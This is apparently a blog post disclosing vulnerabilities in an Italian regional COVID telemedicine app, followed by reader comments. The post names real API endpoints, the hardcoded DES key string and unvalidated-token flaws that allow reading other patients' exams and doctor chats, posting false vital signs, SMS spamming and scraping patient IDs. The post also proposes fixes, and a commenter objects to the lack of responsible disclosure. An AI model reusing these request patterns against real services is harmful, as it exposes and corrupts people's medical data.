LAZIOdrCOVID: a 30 minutes audit to blow up the castle

EDIT:

Looks like the major issue (posting data to other people) has been solved. That’s very good considering I made post less then 6 hours ago and it’s sunday.


Hey folks!
This morning a friend of me (FABIO – Naif – PIETROSANTI) asked me to take a look at an Android application recently released in the Google Play Store to provide a service that link people born in the Lazio region of Italy with family doctors, allowing them to push personal informations such as temperature, bloody pressure and more.

I’ll go fast and straight, following the example of technical security researcher analyzing the Singapore COVID-19 TraceTogether App, showcasing all the vulnerabilities and praising all the govns to provide open source and well done solutions instead of fast and terrible ones.

The application itself is very small. There are around 10/15 classes and figuring out what’s needed to messup the things was very fast.

Let’s start

Getting people family doctor

Registering to the service is done by providing email address, phone number and fiscal code (an alphanumeric ID which can be obtained by knowing name, surname, age of birth and birth place of people).

https://servicelazioadvice.regione.lazio.it/api/PatientRegistration/Login/?fiscalCode=ENCRYPTED_FISCAL_CODE&emailAddress=ENCRYPTED_EMAIL_ADDRESS&phoneNumber=ENCRYPTED_PHONE_NUMBER

The encryption is DES and the key is a static md5 of string “1nt3ll1c4r3” hardcoded in the java code.

By firing the GET request to the previous endpoint we will be able to:

A) access the name of the family doctor for the given fiscal code
B) spam the SMS verification (unlimited N times) to the encrypted phone number (any phone number)

Accessing people exams and reports

The login request above, a-side the family doctor, will also give us an access token which is used on all subsequent requests from the application and a patient ID.

Here is an example of patient ID hiding the last 2 numbers:
ASUR00000000019583XX

Technically, we expect this token to be confirmed and validated with the SMS, but guess what?

A) we can use this token without validation
B) we can use this token on any other patient ID to access their information

https://servicelazioadvice.regione.lazio.it/api/Exams/GetExaminationsByType/?token=TOKEN&patient=PATIENT_ID&type=NUMERIC_TYPE (1 for temperature i.e)

Adding reports to other people

Guess what? with not so big surprise, at this point, we are able to post data on other people ID.

We are able to do some post requests, i.e:

https://servicelazioadvice.regione.lazio.it/api/Exams/InsertExamValue/?token=TOKEN
{“patientId”:”PATIENT_ID“, “type”: “4”, “f_cardiaca”: “74”}

To update the heart rate, in example.

What if we start spamming a temperature update on all the people with a value of… 39 in example.

Chat with the doctors, get personal messages

The application offer a way to chat with the family doctor and receive messages.

https://servicelazioadvice.regione.lazio.it/api/Chat/GetAllMessagesCrypt/?token=TOKEN&patient=PATIENT_ID&doctor=DOCTOR_ID

Doctor id is provided with the login request.

https://servicelazioadvice.regione.lazio.it/api/Chat/ACK/?patient=PATIENT_ID&doctor=DOCTOR_ID HTTP/1.1


At this point, we didn’t go any further. In a world where people out there is targetting hospital and health care facilities:

1) fast achieved solutions is not the way to do.
2) ask for experts opinions and audit. Saving money to achieve online solutions could result in something you don’t want to face.
3) go the damn open source

Performing massive scraping by using the Patient ID, which looks exponential, is also possible.

Here I’m attaching the requests dumped from my device memory if anyone is interested to go any further. (Note, we are not hiding informations such as Fabio ID, phone number and email which are public anyway)

https://gist.github.com/iGio90/9e6dbba9431fa8bbcdc383fd62f0cbff
https://gist.github.com/iGio90/6d460313dfd4d7330d57d0943aee6063

Tips and tricks

We are fighting for a transparent and secure world, a bit utopian but whatever. All of the reported issues above can be addressed by:

A) validate the token prior to the usage
B) store on the backend side which patient ID this token has access to
C) eventually, de-hardcode the DES encryption key in favor of a primitive, runtime built one

As Hackers Community we should monitor all the applications that will get their validation from the Ministry of Innovation fast call https://innovazione.gov.it/telemedicina-e-sistemi-di-monitoraggio-una-call-per-tecnologie-per-il-contrasto-alla-diffusione-del-covid-19/ and all the one that get released and published to ensure that proper technical security testing is done with transparent public reports, because data protection is a technical topic, before than a juridical-legal one.


See you with the next well done service 🙂

Disclaimer: All the tests has been performed using the tax code identifier of Fabio and his family members, thus testing the security vulnerabilities accessing private data of citizens that gave their authorization.

9 Comments

Enrico March 29, 2020 Reply

“White hat hackers are fighting for a transparent and secure world, a bit utopian”, but here the problem is that who creates these services are totally incompetent.
Normally it would be a matter of jokes and funny stories to be shared among the security experts, but these days things like this become dramatic. Incompetence is a disaster for anyone in any area!! And it’s not anymore the time for stupidity. If the COVID-19 teaches something is that incompetence should be banned and vanish. I am even more utopian I know!

Tglman March 29, 2020 Reply

Hi,

Responsible disclosure is as important as doing this tests, for the security of everyone, as far as I appreciate your effort to check the security of the app this post does not sounds responsible, before making this informations public the author should have been notified with a deadline for the publication of the informations!!!

Ocram April 1, 2020 Reply

Great job, well documented. Today I’ve seen on TG a “similar” App, AllertaLOM from “Regione Lombardia” available only for Apple at the moment.
https://apps.apple.com/it/app/allertalom/id1455220682

It will be nice to make a so specific analyze to that one too (also without public disclosure of technical details). Meantime, the privacy policy seems to be a bit too old (2019-Nov):

https://www.allertalom.regione.lombardia.it/privacyapp

Thanks for your effort

GiovanniRocca April 1, 2020 Reply

Hi! I already performed an audit on that application, however it has no login, no info about covid nor a collection of personal data. Did you find anything of this in the iOS one?

Ocram April 1, 2020 Reply

Nope, I’ve only seen the app on TV and flashback to your great work. I coud try it and report back.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.